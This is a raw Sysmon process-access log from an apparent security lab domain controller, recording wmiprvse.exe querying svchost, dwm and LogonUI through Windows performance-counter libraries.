13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 